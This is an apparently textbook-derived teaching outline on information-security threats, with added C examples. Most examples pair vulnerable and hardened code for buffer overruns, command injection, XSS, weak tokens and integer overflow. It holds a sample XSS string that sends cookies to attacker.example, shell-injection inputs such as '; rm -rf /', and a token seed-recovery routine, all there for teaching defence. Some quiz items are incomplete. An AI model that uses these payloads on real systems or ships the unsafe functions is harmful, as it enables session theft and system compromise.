
Principles Of Information Security 5th Edition Pdf


Principles of Information Security, Fifth Edition. Michael E. Whitman, Ph.D., CISM, CISSP, and Herbert J. Mattord, Ph.D., CISM, CISSP, Kennesaw State University. Australia: Cengage Learning. English; illustrated. The text illustrates that information security in the modern organization is a problem for management to solve, not one for technology alone.


Communications and Other Service Provider Issues
1. Describe communications and other service provider issues: other utility services can affect organizations as well. Among these are telephone, water, wastewater, trash pickup, cable television, natural or propane gas, and custodial services. The loss of these services can impair the ability of an organization to function properly.

Power Irregularities


1. Describe power irregularities: irregularities from power utilities are common and can lead to fluctuations such as power excesses, power shortages, and power losses.
2. Explain that voltage levels can spike (momentary increase), surge (prolonged increase), sag (momentary decrease), brownout (prolonged drop in voltage), fault (momentary complete loss of power), or blackout (a lengthier loss of power).
3. Note that because sensitive electronic equipment, especially networking equipment, computers, and computer-based systems, is susceptible to these fluctuations, controls should be applied to manage power quality.

Espionage or Trespass

1. Explain that this threat represents a well-known and broad category of electronic and human activities that breach the confidentiality of information.
2. Explain that when an unauthorized individual gains access to the information an organization is trying to protect, that act is categorized as a deliberate act of espionage or trespass.
3. Point out that some information-gathering techniques are legal and are called competitive intelligence.
4. Note that instances of shoulder surfing occur at computer terminals, desks, ATMs, smartphones, or other places where a person is accessing confidential information.

Hackers
1. Discuss that the act of trespassing can lead to unauthorized actions, real or virtual, that enable information gatherers to enter premises or systems they have not been authorized to enter.
2. Discuss that the classic perpetrator of deliberate acts of espionage or trespass is the hacker. In the gritty world of reality, a hacker uses skill, guile, or fraud to attempt to bypass the controls placed around information that is the property of someone else. The hacker frequently spends long hours examining the types and structures of the targeted systems.
3. Remind students that there are generally two skill levels among hackers. The first is the expert hacker, who develops software scripts and program exploits used by the second category, the novice, or unskilled, hacker.
4. Explain that the expert hacker is usually a master of several programming languages, networking protocols, and operating systems, and also exhibits a mastery of the technical environment of the chosen target system.
5. Point out to students that many expert hackers have become bored with directly attacking systems and have turned to writing software. The software they write consists of automated exploits that allow novice hackers to become script kiddies or packet monkeys: hackers of limited skill who use expertly written software to exploit a system but do not fully understand or appreciate the systems they hack.
6. Discuss the term privilege escalation. Explain that a common example of privilege escalation is jailbreaking or rooting.

Hacker Variants
1. Explain that password attacks fall under the category of espionage or trespass. Point out that attempting to guess or calculate a password is often called cracking.

Forces of Nature
1. Discuss how forces of nature, force majeure, or acts of God pose some of the most dangerous threats, because they are unexpected and can occur with very little warning.
2. Explain that these threats can disrupt not only the lives of individuals, but also the storage, transmission, and use of information.
3. Since it is not possible to avoid many of these threats, management must implement controls to limit damage and also prepare contingency plans for continued operations.
4. Discuss the following examples of force of nature threats:
a. Fire
b. Flood
c. Earthquake
d. Lightning
e. Landslides or mudslides
f. Tornados or severe windstorms
g. Hurricanes, typhoons, and tropical depressions
h. Tsunamis
i. Electrostatic discharge (ESD)
j. Dust contamination
k. Solar activity

Human Error or Failure


1. Describe this category and note that it includes the possibility of acts performed without intent or malicious purpose by an individual who is an employee of an organization.
2. Discuss the fact that employees constitute one of the greatest threats to information security, as they are the individuals closest to the organizational data.
3. Employee mistakes can easily lead to the revelation of classified data, entry of erroneous data, accidental deletion or modification of data, storage of data in unprotected areas, and failure to protect information.
4. Note that many such threats can be prevented with controls, ranging from simple procedures, such as requiring the user to type a critical command twice, to more complex procedures, such as the verification of commands by a second party.

Principles of Information Security, 6th Edition

Teaching Tip: Systems fail for a variety of reasons, but proper procedures ensure the ability to recover to a known good state. The most important aspect of any information security program is to ensure that the organization has a comprehensive continuity planning process.

Social Engineering
1. Note that within the context of information security, social engineering is the process of using social skills to convince people to reveal access credentials or other valuable information to the attacker.
2. Explain that people are the weakest link. You can have the best technology; firewalls, intrusion-detection systems, biometric devices
3. Discuss the social engineering attack known as the advance-fee fraud (AFF).

4. Explain that phishing is an attempt to gain personal or financial information from an individual, usually by posing as a legitimate entity.
5. Note that a variant is spear phishing, a label that applies to any highly targeted phishing attack. While normal phishing attacks target as many recipients as possible, a spear phisher sends a message that appears to be from an employer, a colleague, or another legitimate correspondent to a small group, or even one specific person.
6. Discuss that phishing attacks use two primary techniques, often in combination with one another: URL manipulation and Web site forgery.
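The following is an added example, not code from the textbook or its instructor's manual, showing one concrete form of the URL manipulation just mentioned: the "userinfo@" part of a URL. A reader glancing at http://www.bank.example@203.0.113.7/login sees the bank's name, but RFC 3986 treats everything before the last "@" in the authority as a user name, so the browser actually connects to 203.0.113.7. All hostnames and addresses are constructed documentation values, and the parser is deliberately minimal (it does not handle bracketed IPv6 literals or percent-encoding).

```c
/* Added example (not from the textbook or its instructor's manual): how a
 * URL's "userinfo@" part is used for URL manipulation in phishing. A reader
 * glancing at http://www.bank.example@203.0.113.7/login sees the bank's
 * name, but RFC 3986 treats everything before the last '@' in the authority
 * as a user name, so the browser connects to 203.0.113.7. All hostnames and
 * addresses here are constructed documentation values. */
#include <stdio.h>
#include <string.h>

/* Locate the authority ("[user@]host[:port]") of url. Returns a pointer to
 * it and stores its length in *len, or NULL if the URL has no "scheme://". */
static const char *authority(const char *url, size_t *len)
{
    const char *p = strstr(url, "://");
    if (p == NULL) return NULL;
    p += 3;
    *len = strcspn(p, "/?#");        /* authority ends at '/', '?' or '#' */
    return p;
}

/* Copy the host the browser will actually connect to into host (size hostsz).
 * Returns 1 on success, 0 if the URL is malformed or the host does not fit. */
int effective_host(const char *url, char *host, size_t hostsz)
{
    size_t alen;
    const char *a = authority(url, &alen);
    if (a == NULL) return 0;
    const char *h = a;
    for (size_t i = 0; i < alen; i++)        /* userinfo ends at the LAST '@' */
        if (a[i] == '@') h = a + i + 1;
    size_t hlen = (size_t)(a + alen - h);
    const char *colon = memchr(h, ':', hlen); /* drop an explicit port */
    if (colon) hlen = (size_t)(colon - h);
    if (hlen + 1 > hostsz) return 0;
    memcpy(host, h, hlen);
    host[hlen] = '\0';
    return 1;
}

/* Returns 1 if the URL carries a userinfo part, the tell-tale of this trick. */
int has_userinfo(const char *url)
{
    size_t alen;
    const char *a = authority(url, &alen);
    return a != NULL && memchr(a, '@', alen) != NULL;
}

/* Convenience for checks: does url's effective host equal expected? */
int host_equals(const char *url, const char *expected)
{
    char host[256];
    return effective_host(url, host, sizeof host) && strcmp(host, expected) == 0;
}

int main(void)
{
    const char *samples[] = {                       /* constructed */
        "http://www.bank.example/login",
        "http://www.bank.example@203.0.113.7/login",
        "https://www.bank.example:443/secure@area",  /* '@' in the path, not the authority */
    };
    char host[256];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        if (effective_host(samples[i], host, sizeof host))
            printf("%-44s -> %-17s%s\n", samples[i], host,
                   has_userinfo(samples[i]) ? "  (userinfo present: suspicious)" : "");
    return 0;
}
```

A mail gateway or link-rewriting proxy applies the same rule: compare the effective host against the one the visible text suggests, and treat any URL whose authority contains "@" as suspect.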

7. Point out that another form of social engineering is called pretexting, which is sometimes referred to as phone phishing.

Information Extortion
1. Describe how the threat of information extortion involves the possibility of an attacker or trusted insider stealing information from a computer system and demanding compensation for its return or for an agreement not to disclose the information.

Extortion is common in credit card number theft.

Sabotage or Vandalism
1. This category of threat involves the deliberate sabotage of a computer system or business, or acts of vandalism to either destroy an asset or damage the image of an organization.
2. Emphasize that these threats can range from petty vandalism by employees to organized sabotage against an organization.

Online Activism
1. Compared to Web site defacement, vandalism within a network is more malicious in intent and less public.
2. Explain that security experts are noticing a rise in another form of online vandalism, hacktivist or cyberactivist operations.
3. A more extreme version is referred to as cyberterrorism.
4. Compare cyberterrorism to more positive online activism, such as using Facebook, Twitter, etc.

Quick Quiz 1
1. True or False: The three communities of interest are general management, operations management, and information security management.
Answer: False
2. Hackers of limited skill who use expertly written software to attack a system are known as which of the following?
3. Which of the following occurs when an attacker or trusted insider steals information from a computer system and demands compensation for its return or for an agreement not to disclose it?
a. Information extortion
b. Technological extortion
c. Insider trading
d. Information hoarding
Answer: A
4. Which type of attacker will hack systems to conduct terrorist activities via network or Internet pathways?
a. Cyberhackers
b. Electronic terrorists
c. Cyberterrorists
d. Electronic hackers
Answer: C
5. Answer: True

Software Attacks
1. Emphasize that an attack is a deliberate act that exploits a vulnerability to compromise a controlled system.


2. This attack can consist of specially crafted software that attackers trick users into installing on their systems.

Teaching Tip: You should pause now to ensure that students understand the difference between threats, vulnerabilities, exploits, and attacks. Verify that students understand how these terms combine and transition.

Malware
1. Describe malware as malicious code or malicious software.
2. Point out that other attacks that use software, like redirect attacks and denial-of-service attacks, also fall under this threat.
3. Note that the malicious code attack includes the execution of viruses, worms, Trojan horses, and active Web scripts with the intent to destroy or steal information.
4. Explain that the polymorphic, or multivector, worm is a state-of-the-art attack system. Point out that these attack programs use up to six known attack vectors to exploit a variety of vulnerabilities in commonly found information system devices.
5. Point out to students that when an attack makes use of malware that is not yet known to the anti-malware software companies, it is said to be a zero-day attack.
6. Use Table to review some of the most dangerous malware attacks to date.

Virus
1. Explain that a computer virus consists of code segments that perform malicious actions.
2. Point out to students that one of the most common methods of virus transmission is via e-mail attachments.

3. Mention that viruses can be classified by how they spread themselves. Discuss the most common types of information system viruses, the macro virus and the boot virus.
4. Explain the classification known as memory-resident and non-memory-resident viruses. Note that resident viruses are capable of reactivating when the computer is booted and continuing their actions until the system is shut down.

Worms
1. Describe worms as self-replicating malware that, unlike a virus, needs no host program and can continue replicating until it completely fills available resources.
2. Use Figure to discuss the Nimda and Sircam worms.

Trojan Horses
1. Explain that Trojan horses are frequently disguised as helpful or necessary pieces of software, such as the readme.
2. Use Figure in your discussion.

Polymorphic Threats
1. Explain that a polymorphic threat evolves, changing its size and other external file characteristics in order to elude detection by antivirus software programs.

Virus and Worm Hoaxes
1. Explain that a more devious approach to attacking computer systems is the transmission of a virus hoax.

Back Doors
1. Discuss how, using a known or previously unknown and newly discovered access mechanism, an attacker can gain access to a system or network resource through a back door.
2. Point out that these doors are often referred to as a maintenance hook.

Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS)
1. Explain that a denial-of-service attack begins when an attacker sends a large number of connection or information requests to a target. So many requests are made that the target system cannot handle them successfully along with other legitimate requests for service. This may result in the system crashing or simply becoming unable to perform ordinary functions.
2. Define a distributed denial-of-service attack as one in which a coordinated stream of requests is launched against a target from many locations at the same time.
3. Explain how compromised machines are turned into bots or zombies, which can be directed remotely by the attacker in order to participate in the attack.
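As an added example (not code from the textbook or its instructor's manual), here is the simplest detection a practitioner runs against a request log to notice the flood described above: count requests per client inside a sliding window and flag any client that exceeds a threshold. The log line format "<epoch seconds> <client ip>", the thresholds, and the addresses and timestamps in the sample are all constructed for the example; a DDoS shows up as many clients each just under such a threshold, which is why real deployments also watch aggregate rates.

```c
/* Added example (not from the textbook or its instructor's manual): a
 * minimal request-rate monitor of the kind run over an access log to spot
 * a flood from one source. Each log line is "<epoch seconds> <client ip>"
 * (a constructed format); a client sending more than MAX_PER_WINDOW
 * requests inside WINDOW_SECONDS is flagged once. Addresses and times in
 * the sample are made up. */
#include <stdio.h>
#include <string.h>

#define MAX_CLIENTS     64
#define WINDOW_SECONDS  10
#define MAX_PER_WINDOW  5

struct client {
    char ip[46];          /* long enough for an IPv6 literal */
    long window_start;    /* timestamp that opened the current window */
    int  count;           /* requests seen in the current window */
    int  flagged;
};

static struct client clients[MAX_CLIENTS];
static int nclients;

static struct client *lookup(const char *ip)
{
    for (int i = 0; i < nclients; i++)
        if (strcmp(clients[i].ip, ip) == 0) return &clients[i];
    if (nclients == MAX_CLIENTS) return NULL;   /* table full: drop (real code would evict) */
    struct client *c = &clients[nclients++];
    snprintf(c->ip, sizeof c->ip, "%s", ip);
    c->window_start = -1;
    c->count = 0;
    c->flagged = 0;
    return c;
}

/* Feed one log line. Returns 1 the first time a client crosses the threshold,
 * 0 otherwise, -1 for a malformed line or a full table. */
int observe(const char *line)
{
    long ts;
    char ip[46];
    if (sscanf(line, "%ld %45s", &ts, ip) != 2) return -1;
    struct client *c = lookup(ip);
    if (c == NULL) return -1;
    if (c->window_start < 0 || ts - c->window_start >= WINDOW_SECONDS) {
        c->window_start = ts;                    /* open a new window */
        c->count = 0;
    }
    c->count++;
    if (c->count > MAX_PER_WINDOW && !c->flagged) {
        c->flagged = 1;
        return 1;
    }
    return 0;
}

/* Reset state, run over n lines, return how many clients were flagged. */
int scan(const char *const *lines, int n)
{
    nclients = 0;
    int flagged = 0;
    for (int i = 0; i < n; i++)
        if (observe(lines[i]) == 1) flagged++;
    return flagged;
}

int is_flagged(const char *ip)
{
    for (int i = 0; i < nclients; i++)
        if (strcmp(clients[i].ip, ip) == 0) return clients[i].flagged;
    return 0;
}

/* Constructed sample: 198.51.100.9 fires 8 requests in 4 seconds while
 * 203.0.113.5 sends a normal trickle. */
static const char *const sample_lines[] = {
    "1700000000 203.0.113.5",
    "1700000001 198.51.100.9", "1700000001 198.51.100.9",
    "1700000002 198.51.100.9", "1700000002 198.51.100.9",
    "1700000003 198.51.100.9", "1700000003 198.51.100.9",
    "1700000003 198.51.100.9", "1700000004 198.51.100.9",
    "1700000005 203.0.113.5",
    "1700000030 203.0.113.5",
};

int sample_count(void) { return (int)(sizeof sample_lines / sizeof sample_lines[0]); }

int main(void)
{
    int flagged = scan(sample_lines, sample_count());
    printf("%d client(s) exceeded %d requests in %d s\n", flagged, MAX_PER_WINDOW, WINDOW_SECONDS);
    for (int i = 0; i < nclients; i++)
        if (clients[i].flagged) printf("  flood suspect: %s\n", clients[i].ip);
    return 0;
}
```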


E-mail Attacks
1. Note that spam is unsolicited commercial e-mail. While many consider spam a nuisance rather than an attack, it is emerging as a vector for some attacks.
2. Explain that mail bombing is another form of e-mail attack that is also a DoS, in which an attacker routes large quantities of e-mail to the target.

Communications Interception Attacks
1. Explain that common software-based communications attacks include several subcategories designed to intercept and collect information in transit.
2. Point out to students that the emergence of the Internet of Things (IoT) increases the possibility of these types of attacks.

Packet Sniffer
1. Describe a sniffer as a program or a device that can monitor data traveling over a network. It can be used both for legitimate network management functions and for stealing information from a network.

Spoofing
1. Emphasize that spoofing is a technique used to gain unauthorized access to computers, wherein the intruder sends messages to a computer containing an IP address that indicates that the messages are coming from a trusted host.

Pharming
1. Explain that pharming redirects legitimate Web traffic to a fraudulent site by corrupting name resolution (DNS or the host's local lookup), so that the victim reaches the attacker's site even after typing the correct address.

Man-in-the-Middle
1. Explain that an attacker sniffs packets from the network, modifies them, and inserts them back into the network.
2. Point out that in a TCP hijacking attack, the attacker uses address spoofing to impersonate other legitimate entities on the network. Mention that this is also known as session hijacking.

Teaching Tip: Many students will find this the most interesting part of the chapter. Make sure you cover the ethical and legal implications of these attack descriptions.

Technical Hardware Failures or Errors
1. Emphasize that technical hardware failures or errors occur when a manufacturer distributes to users equipment containing a known or unknown flaw. These defects can cause the system to perform outside of expected parameters, resulting in unreliable or unavailable service.
2. Discuss that some errors are terminal, in that they result in the unrecoverable loss of the equipment. Some errors are intermittent, in that they only periodically manifest themselves, resulting in faults that are not easily repeated.
3. Discuss the Intel Pentium II chip failure. Point out that it is one of the best-known hardware failures to date.

Mean Time Between Failure

Technical Software Failures or Errors
1. Explain that this category involves threats that come from downloading software with unknown, hidden faults. Large quantities of computer code are written, debugged, published, and sold before all of their bugs are detected and resolved.
2. Discuss how combinations of certain software and hardware can reveal new bugs.

The Deadly Sins in Software Security

1. Explain that some software development problems result in software that is difficult or impossible to deploy in a secure fashion.
2. There are 24 problem areas, or categories, in software development (also called software engineering) in which these problems arise.
3. Describe buffer overruns. Buffers are used when there is a mismatch in the processing rates between two entities involved in a communication process. A buffer overrun, or buffer overflow, is an application error that occurs when more data is sent to a program buffer than it is designed to handle. During a buffer overrun, an attacker can make the target system execute instructions, or can take advantage of some other unintended consequence of the failure.
4. Explain that effective software has the ability to catch and resolve exceptions, which are unusual situations that require special processing.
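As an added example (not code from the textbook or its instructor's manual), the buffer overrun above in its classic C form beside the bounds-checked version. The record layout, the 16-byte field size, and the sample inputs are chosen for the example; the unsafe function is shown for contrast and deliberately never called with oversized input, because what happens after the overrun is undefined behaviour.

```c
/* Added example (not from the textbook or its instructor's manual): the
 * buffer overrun described above. store_unsafe() copies whatever it is
 * given into a 16-byte field, so a 40-byte name writes 24 bytes past the
 * field, over is_admin and whatever follows on the stack; that is how
 * control flow gets hijacked. store_safe() checks the length first.
 * Field sizes and sample inputs are chosen for the example. */
#include <stdio.h>
#include <string.h>

#define NAME_LEN 16

struct record {
    char name[NAME_LEN];
    int  is_admin;      /* sits right after the buffer: a favourite overflow target */
};

/* Vulnerable: no check that src fits in NAME_LEN bytes. */
void store_unsafe(struct record *r, const char *src)
{
    strcpy(r->name, src);   /* writes strlen(src)+1 bytes regardless of space */
}

/* Hardened: refuse input that will not fit, terminator included.
 * Returns 1 on success, 0 if the input was rejected. */
int store_safe(struct record *r, const char *src)
{
    /* Look for the terminator within the field; never scan past NAME_LEN. */
    const char *end = memchr(src, '\0', NAME_LEN);
    if (end == NULL) return 0;                 /* NAME_LEN or more chars: no room for NUL */
    memcpy(r->name, src, (size_t)(end - src) + 1);
    return 1;
}

/* Helper for checks: is_admin after a safe store of src into a fresh record,
 * or -1 if the store was rejected. Shows the adjacent field stays untouched. */
int admin_after_safe_store(const char *src)
{
    struct record r = { "", 0 };
    return store_safe(&r, src) ? r.is_admin : -1;
}

int main(void)
{
    struct record r = { "", 0 };
    const char *short_name = "alice";
    const char *long_name  = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";  /* 40 bytes */

    printf("safe store of \"%s\": %s\n", short_name,
           store_safe(&r, short_name) ? "accepted" : "rejected");
    printf("safe store of 40 A's:  %s\n",
           store_safe(&r, long_name) ? "accepted" : "rejected");
    printf("is_admin is still %d\n", r.is_admin);
    /* store_unsafe(&r, long_name) would overrun r.name and clobber is_admin;
     * it is deliberately not called. */
    return 0;
}
```

The check is on the length the destination can hold, not on what the caller promises; the same rule applies to strncpy-style calls, which also need the terminator written explicitly.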

5. Define command injection, and explain that command injection problems occur when user input is passed directly to a compiler or interpreter (most often a command shell) without being checked, so that metacharacters in the input are interpreted as additional commands.
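As an added example (not code from the textbook or its instructor's manual), command injection in C, where the usual sink is system() handed a string built from user input, beside the two defences a practitioner applies together: an allow-list check on the input and passing it as its own argv element via execvp so no shell ever parses it. The "ping a user-supplied host" scenario, the allow-list, and the sample inputs are constructed for the example.

```c
/* Added example (not from the textbook or its instructor's manual):
 * command injection through system(), and the hardened alternative.
 * Scenario and sample inputs are constructed. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable: the string goes to a shell, so "8.8.8.8; rm -rf /" is two commands.
 * Returns 1 if the command fit in the buffer. */
int build_command_unsafe(char *out, size_t outsz, const char *host)
{
    return snprintf(out, outsz, "ping -c 1 %s", host) < (int)outsz;
}

/* Allow-list: a hostname or address may contain only letters, digits,
 * '.', '-' and ':', may not be empty or over 253 bytes, and may not start
 * with '-' (ping would read it as an option). Returns 1 if acceptable. */
int is_safe_host(const char *host)
{
    size_t n = strlen(host);
    if (n == 0 || n > 253 || host[0] == '-') return 0;
    for (size_t i = 0; i < n; i++) {
        char c = host[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '.' || c == '-' || c == ':';
        if (!ok) return 0;
    }
    return 1;
}

/* Hardened: validate, then exec with an argv array; no shell is involved.
 * Returns the child's exit status, or -1 if the input was rejected or
 * fork failed. */
int ping_host(const char *host)
{
    if (!is_safe_host(host)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "ping", "-c", "1", (char *)host, NULL };
        execvp("ping", argv);
        _exit(127);                     /* exec failed */
    }
    int status;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* For inspection: does the string system() would receive contain needle? */
int unsafe_command_contains(const char *host, const char *needle)
{
    char cmd[512];
    build_command_unsafe(cmd, sizeof cmd, host);
    return strstr(cmd, needle) != NULL;
}

int main(void)
{
    const char *inputs[] = { "8.8.8.8", "8.8.8.8; rm -rf /", "$(id)", "-f" };  /* constructed */
    char cmd[512];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        build_command_unsafe(cmd, sizeof cmd, inputs[i]);
        printf("input %-20s -> system(\"%s\")  allow-list: %s\n", inputs[i], cmd,
               is_safe_host(inputs[i]) ? "accepted" : "REJECTED");
    }
    return 0;
}
```

The allow-list is the primary control; the argv form is defence in depth, since even an accepted value never reaches a shell. Escaping metacharacters is the weakest of the three and is not shown.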

6. Define cross-site scripting (XSS), which occurs when a Web application includes data supplied by one user in a page sent to other users without neutralizing it, so that attacker-supplied script runs in the victims' browsers, typically to steal session cookies or other data.
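As an added example (not code from the textbook or its instructor's manual), the standard defence against the XSS just described: encoding user-supplied text before it is written into HTML. The handler, the page template, and the attack string are constructed for the example; the escaper covers the five characters that change structure in HTML element and attribute content.

```c
/* Added example (not from the textbook or its instructor's manual): output
 * encoding for HTML, beside a handler that omits it. The "search results"
 * page and the sample attack string are constructed. */
#include <stdio.h>
#include <string.h>

/* Escape src into dst (size dstsz). Returns the length the escaped text
 * needs, excluding the terminator; if that is >= dstsz the output was
 * truncated (cleanly, at a character boundary). */
size_t html_escape(const char *src, char *dst, size_t dstsz)
{
    size_t need = 0, w = 0;
    int full = 0;
    for (const char *p = src; *p; p++) {
        const char *rep;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#x27;"; break;
        default:   rep = NULL;     break;
        }
        size_t rlen = rep ? strlen(rep) : 1;
        need += rlen;
        if (!full && w + rlen < dstsz) {      /* keep room for the terminator */
            if (rep) memcpy(dst + w, rep, rlen); else dst[w] = *p;
            w += rlen;
        } else {
            full = 1;                         /* stop writing once anything is dropped */
        }
    }
    if (dstsz) dst[w] = '\0';
    return need;
}

/* Vulnerable: echoes the search term into the page verbatim. */
int render_unsafe(char *page, size_t pagesz, const char *term)
{
    return snprintf(page, pagesz, "<p>Results for: %s</p>", term);
}

/* Hardened: same page, term escaped first. */
int render_safe(char *page, size_t pagesz, const char *term)
{
    char esc[512];
    html_escape(term, esc, sizeof esc);
    return snprintf(page, pagesz, "<p>Results for: %s</p>", esc);
}

/* Helpers for checks. */
int escapes_to(const char *src, const char *expected)
{
    char buf[512];
    html_escape(src, buf, sizeof buf);
    return strcmp(buf, expected) == 0;
}

size_t escaped_length(const char *src)
{
    char buf[512];
    return html_escape(src, buf, sizeof buf);
}

int safe_page_contains_script_tag(const char *term)
{
    char page[1024];
    render_safe(page, sizeof page, term);
    return strstr(page, "<script") != NULL;
}

int main(void)
{
    /* constructed attack string: would ship the cookie to attacker.example */
    const char *term = "<script>location='http://attacker.example/?c='+document.cookie</script>";
    char page[1024];
    render_unsafe(page, sizeof page, term);
    printf("unsafe: %s\n", page);
    render_safe(page, sizeof page, term);
    printf("safe:   %s\n", page);
    return 0;
}
```

Encoding is context-specific: this escaper is correct for text and quoted attribute values, while a value placed inside a script block, a URL, or a CSS property needs the encoder for that context.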

7. Explain that failure to handle errors can cause a variety of unexpected system behaviors. Programmers are expected to anticipate problems and prepare their application code to handle them.
8. Describe the failure to protect network traffic and explain that with the growing popularity of wireless networking comes a corresponding increase in the risk that wirelessly transmitted data will be intercepted. Most wireless networks are installed and operated with little or no protection for the information that is broadcast between the client and the wireless access point. Without appropriate encryption, such as that afforded by WPA2 or later, attackers can intercept and view the data. Traffic on a wired network is also vulnerable to interception in some situations.
9. Explain the failure to store and protect data securely. Programmers are responsible for integrating access controls into, and keeping secret information out of, programs. Access controls regulate who, what, when, where, and how individuals and systems interact with data.
10. Discuss the failure to use cryptographically strong random numbers. Many computer systems use random number generators; if the generator's output is predictable, an attacker can reproduce the session identifiers, keys, or tokens derived from it.
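As an added example (not code from the textbook or its instructor's manual), why a token drawn from rand() seeded with the clock is not random in the sense that matters: anyone who knows roughly when it was issued can regenerate it by trying each candidate seed. The strong version reads the operating system's CSPRNG through /dev/urandom (on Linux, getrandom(2) is the preferred interface; the device path is used here so the example also builds on other Unix-like systems). Token size and the time window are chosen for the example.

```c
/* Added example (not from the textbook or its instructor's manual):
 * predictable versus cryptographically strong token generation, with the
 * seed-recovery attack that breaks the weak one. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#define TOKEN_BYTES 16

/* Weak: fully determined by the seed. */
void weak_token(unsigned seed, unsigned char out[TOKEN_BYTES])
{
    srand(seed);
    for (int i = 0; i < TOKEN_BYTES; i++) out[i] = (unsigned char)(rand() & 0xff);
}

/* Strong: reads from the OS CSPRNG. Returns 1 on success, 0 on failure;
 * a caller must treat failure as fatal rather than fall back to rand(). */
int strong_token(unsigned char out[TOKEN_BYTES])
{
    FILE *f = fopen("/dev/urandom", "rb");
    if (f == NULL) return 0;
    size_t got = fread(out, 1, TOKEN_BYTES, f);
    fclose(f);
    return got == TOKEN_BYTES;
}

/* The attack: given a captured weak token and a window of plausible issue
 * times, return the seed that reproduces it, or -1 if none in the window does. */
long recover_seed(const unsigned char token[TOKEN_BYTES], unsigned from, unsigned to)
{
    unsigned char cand[TOKEN_BYTES];
    for (unsigned s = from; s <= to; s++) {
        weak_token(s, cand);
        if (memcmp(cand, token, TOKEN_BYTES) == 0) return (long)s;
        if (s == to) break;             /* avoid wrapping if to == UINT_MAX */
    }
    return -1;
}

/* Helpers for checks. */
int weak_token_is_reproducible(unsigned seed)
{
    unsigned char a[TOKEN_BYTES], b[TOKEN_BYTES];
    weak_token(seed, a);
    weak_token(seed, b);
    return memcmp(a, b, TOKEN_BYTES) == 0;
}

int seed_recoverable(unsigned seed, unsigned window)
{
    unsigned char tok[TOKEN_BYTES];
    weak_token(seed, tok);
    return recover_seed(tok, seed - window, seed) == (long)seed;
}

int strong_tokens_differ(void)
{
    unsigned char a[TOKEN_BYTES], b[TOKEN_BYTES];
    if (!strong_token(a) || !strong_token(b)) return 0;
    return memcmp(a, b, TOKEN_BYTES) != 0;
}

static void print_hex(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++) printf("%02x", p[i]);
    printf("\n");
}

int main(void)
{
    unsigned issued = (unsigned)time(NULL);      /* server seeds with the clock */
    unsigned char tok[TOKEN_BYTES];
    weak_token(issued, tok);
    printf("weak token:   "); print_hex(tok, TOKEN_BYTES);
    /* attacker only knows it was issued within the last hour */
    printf("seed recovered: %ld (actual %u)\n", recover_seed(tok, issued - 3600, issued), issued);
    if (strong_token(tok)) { printf("strong token: "); print_hex(tok, TOKEN_BYTES); }
    return 0;
}
```

The point is not that rand() has visible patterns but that its entire output is a function of a 32-bit seed, so the search space is the seed, not the token.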

11. Describe format string problems, which arise when attacker-controlled input is used as the format argument of a printf-family function, so that conversion specifiers in the input read or write memory the program never intended to expose.
12. Define improper file access. If attackers change the expected location of a file, by intercepting and modifying a program code call, they can force a program to use their own files rather than the files the program is supposed to use. The potential for damage or disclosure is extreme, so it is critical to protect the location of the files, as well as the method and communications channels by which these files are accessed.
13. Discuss the improper use of SSL. Programmers use Secure Sockets Layer (SSL), today superseded by Transport Layer Security (TLS), to transfer sensitive data such as credit card numbers and other personal information between a client and server.

14. Explain that information leakage, one of the most common methods of obtaining inside and classified information, is obtaining it directly or indirectly from an individual, usually an employee. By warning employees against disclosing information, organizations can protect the secrecy of their operations.
15. Describe integer bugs (overflows and underflows). Although paper-and-pencil arithmetic can deal with arbitrary numbers of digits, the binary representations used by computers are of a particular fixed length. Integer bugs are usually exploited indirectly: triggering an integer bug enables an attacker to corrupt other areas of memory, gaining control of an application.
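As an added example (not code from the textbook or its instructor's manual), the "indirect" exploitation just described in concrete form: a message parser adds two 16-bit lengths to check that a message fits in a fixed buffer, the addition wraps, the check passes, and the copy that follows would overrun the buffer. The checked versions detect the wrap. The message layout, buffer size, and lengths are constructed for the example.

```c
/* Added example (not from the textbook or its instructor's manual): an
 * integer overflow that defeats a bounds check, and the checked arithmetic
 * that catches it. Layout and sizes are constructed. */
#include <stdint.h>
#include <stdio.h>

#define BUF_SIZE 1024

/* Vulnerable: the total is computed in the same narrow type as the inputs,
 * so 64 + 65472 = 65536 becomes 0 and passes. Returns 1 if the flawed
 * arithmetic says the message fits. */
int fits_unsafe(uint16_t header_len, uint16_t payload_len)
{
    uint16_t total = (uint16_t)(header_len + payload_len);   /* wraps modulo 65536 */
    return total <= BUF_SIZE;
}

/* Hardened: compute in a wider type so the sum cannot wrap, then compare.
 * Returns 1 if the message fits (storing the true total if total_out is
 * non-NULL), 0 otherwise. */
int fits_safe(uint16_t header_len, uint16_t payload_len, uint32_t *total_out)
{
    uint32_t total = (uint32_t)header_len + (uint32_t)payload_len;
    if (total > BUF_SIZE) return 0;
    if (total_out) *total_out = total;
    return 1;
}

/* The same idea for the multiplication in an allocation of n elements of
 * size s: returns 1 and stores n*s if it cannot wrap, 0 if it would. */
int checked_mul(size_t n, size_t s, size_t *bytes)
{
    if (s != 0 && n > SIZE_MAX / s) return 0;
    if (bytes) *bytes = n * s;
    return 1;
}

int main(void)
{
    uint16_t h = 64, p = 65472;        /* sum is 65536, which is 0 as a uint16_t */
    uint32_t total;
    printf("unsafe check says the message fits: %s\n", fits_unsafe(h, p) ? "yes (wrong)" : "no");
    printf("safe check says the message fits:   %s\n", fits_safe(h, p, &total) ? "yes" : "no");
    size_t bytes;
    printf("allocating SIZE_MAX/2 elements of 4 bytes: %s\n",
           checked_mul(SIZE_MAX / 2, 4, &bytes) ? "ok" : "refused: would wrap");
    return 0;
}
```

The pattern generalises: any length, count, or offset that comes from the network or a file is computed in a type wide enough that the arithmetic cannot wrap, or is checked against the type's limit before the operation.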
